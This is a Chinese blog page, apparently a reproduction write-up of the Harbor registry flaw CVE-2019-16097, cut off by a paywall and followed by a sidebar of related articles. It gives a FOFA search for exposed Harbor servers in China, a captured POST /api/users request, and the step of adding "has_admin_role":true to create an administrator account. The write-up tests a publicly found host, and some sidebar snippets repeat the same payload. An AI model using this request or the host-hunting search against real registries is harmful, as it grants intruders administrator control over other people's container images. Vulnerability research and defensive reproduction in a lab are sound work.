Harbor未授权创建管理员漏洞(CVE-2019-16097)

最新推荐文章于 2025-10-27 09:23:28 发布

原创

最新推荐文章于 2025-10-27 09:23:28 发布 · 2.4k 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#cve-2019-16097 #harbor #创建管理员

环境准备

fofa搜索环境

title="Harbor" && country=CN

找到一个可用环境测试

测试

注册账号，填写账号信息后抓包

POST /api/users HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 111
Connection: close
Referer: https://103.24.179.7/harbor/sign-in?signout=true
Cookie: beegosessionID=c2309d1e5295946e5c1d59e7c63bf5a0

{"username":"whami123","email":"whoami123@qq.com","realname":"whoami123","password":"Whoami123_","comment":"2"}

在包内容里面添加"has_admin_role":true，即

POST /api/users HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

sojrs_sec

关注关注

3
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Harbor未授权创建管理员

「我唯一会的和擅长的只有网络安全，如果我不能在我最擅长的事情上取得成功，那么我根本不知道，我的人生还有什么意义。」

07-11

754

人处在幸福与不幸交织的矛盾之中，反而使内心有一种更为深刻的痛苦，看来近在眼前的幸福而实际上又远得相当渺茫，海市蜃楼。放不得抓不住。

红队攻防文库

「我唯一会的和擅长的只有网络安全，如果我不能在我最擅长的事情上取得成功，那么我根本不知道，我的人生还有什么意义。」

08-23

756

各家兴便是天下大同

参与评论您还未登录，请先登录后发表或查看评论

Harbor任意管理员注册漏洞(CVE-2019-16097)复现

test\\的博客

10-13

1719

Harbor任意管理员注册漏洞复现 fhh# 欢迎使用Markdown编辑器你好！这是你第一次使用 Markdown编辑器所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章，了解一下Markdown的基本语法知识。新的改变我们对Markdown编辑器进行了一些功能拓展与语法支持，除了标准的Markdown编辑器功能，我们增加了如下几点新功能，帮助你用它写博...

Harbor 镜像仓库存在未授权访问漏洞

whoami

01-16

8547

Harbor 受影响版本中镜像仓库存在访问控制缺陷，攻击者可通过页面搜索镜像名称，绕过登陆验证逻辑，直接查看结果中未授权的私有镜像仓库并获取仓库信息（Pull、Push的时间和commit信息，以及镜像存在的漏洞信息等）。本漏洞广泛存在于业界使用的harbor版本中。不过harbor常放置于企业内网，可以缓解该问题。Harbor 是一个开源的 Docker Registry 管理项目，用于托管容器镜像。升级harbor到 2.6.0 或更高版本。

12、Harbor的访问控制、认证与安全策略解析

热门推荐

m0_49025459的博客

04-29

1万+

是为企业用户设计的容器镜像仓库开源项目，包括了权限管理(RBAC)、LDAP、审计、安全漏洞扫描、镜像验真、管理界面、自我注册、HA等企业必需的功能，同时针对中国用户的特点，设计镜像复制和中文支持等功能。

Harbor未授权访问漏洞

菜鸟的自学之路

12-27

1657

Harbor未授权访问漏洞

Harbor禁用swagger.json（Swagger未授权访问漏洞）

从云原生运维转网络安全。

09-15

4930

VMwareHarbor镜像仓库默认使用了swagger ui，也因此暴露了swagger.json文件。在安全要求高的环境下会触发“Swagger未授权访问漏洞”，虽然暴露的信息不是特别关键。但仍然是信息泄露，需要禁用swagger.json的访问。

11、利用 Harbor 管理容器镜像

k8l9m0n的博客

06-27

本文详细介绍了 Harbor 在容器镜像管理中的重要作用，包括其在安全性、操作控制和可扩展性方面的优势，并深入解析了 Harbor 的内部结构。文章还提供了 Harbor 的安装配置步骤及常见日常操作，帮助用户快速上手并高效管理容器镜像，提升云原生应用的开发与部署效率。

一文学会Harbor多租户管理：从权限控制到资源隔离

StevenZeng学堂

07-14

770

❤️ 摘要：云原生环境中，镜像仓库的多租户管理是确保资源隔离、权限控制和高效协作的重要组成部分。Harbor 作为一个开源的企业级镜像仓库，它提供了强大的多租户管理功能，包括用户管理、角色分配、项目隔离等。本文将带你快速掌握如何在 Harbor 中实现高效的多租户管理。

Harbor工作原理及使用指南

北斗云的博客

06-08

923

Harbor作为企业级容器镜像注册表，其工作原理涉及多个核心流程和机制，包括用户认证、镜像管理、安全扫描、复制同步等。本节将详细介绍Harbor的工作原理，帮助读者深入理解Harbor的内部机制和运行流程。

K8S--解决访问Harbor私有仓库无权限的问题（401 Unauthorized）

IT利刃出鞘的博客

01-18

4230

本文解决K8S访问Harbor私有仓库无权限的问题：401 Unauthorized。

CVE-2019-16097：Harbor任意管理员注册漏洞复现

Sylon的博客

09-29

2307

0) 原文参考原创 Timeline Sec Richard 1) Harbor简介 Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器，通过添加一些企业必需的功能特性，例如安全、标识和管理等，扩展了开源Docker Distribution。作为一个企业级私有Registry服务器，Harbor提供了更好的性能和安全。提升用户使用Re...

Harbor越权任意管理员注册复现(CVE-2019-16097)

OKAY_TC的博客

01-16

791

核心添加字段："has_admin_role":true 正常注册：添加管理员权限字段："has_admin_role":true

Harbor任意管理员注册漏洞复现CVE-2019-16097

ddr12231的博客

09-21

339

注册时抓包添加poc "has_admin_role":true 管理员权限 POC POST /api/users HTTP/1.1 Host: 127.0.0.1 Content-Length: 131 Accept: application/json Origin: http://127.0.0.1 User-Agent: Opera/9.80 (Windows NT 6....

未授权访问漏洞总结

LuckySec

03-24

6157

前言：这篇文章主要收集一些常见的未授权访问漏洞。未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 0x01 未授权漏洞预览 Active MQ 未授权访问 Atlassian Crowd 未授权访问 CouchDB 未授权访问 Docker 未授权访问 Dubbo 未授权访问 Druid 未授权访问 Elasticsearch 未授权访问 FTP 未授权访问 Hadoop 未授权访问 JBoss 未授权访

harbor安装_Harbor任意管理员注册漏洞(CVE-2019-16097)

weixin_39790877的博客

11-30

365

0x00 Harbor简介 Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器，通过添加一些企业必需的功能特性，例如安全、标识和管理等，扩展了开源Docker Distribution。作为一个企业级私有Registry服务器，Harbor提供了更好的性能和安全。提升用户使用Registry构建和运行环境传输镜像的效率。0x01 原理概述 ...

harbor 的CVE-2022-46463

08-12

很抱歉，我找不到关于"harbor 的CVE-2022-46463"的相关信息。可能是因为这个CVE编号不存在或者我没有引用到相关内容。请提供更多细节或者确认你提供的引用内容是否准确。123 #### 引用[.reference_title] - *1* [GitHub Enterprise Server 存在授权不当漏洞（CVE-2022-46258）](https://blog.youkuaiyun.com/murphysec/article/details/128640946)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2022-22947 SpringCloud GateWay SPEL RCE 漏洞分析](https://blog.youkuaiyun.com/murphysec/article/details/129178607)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]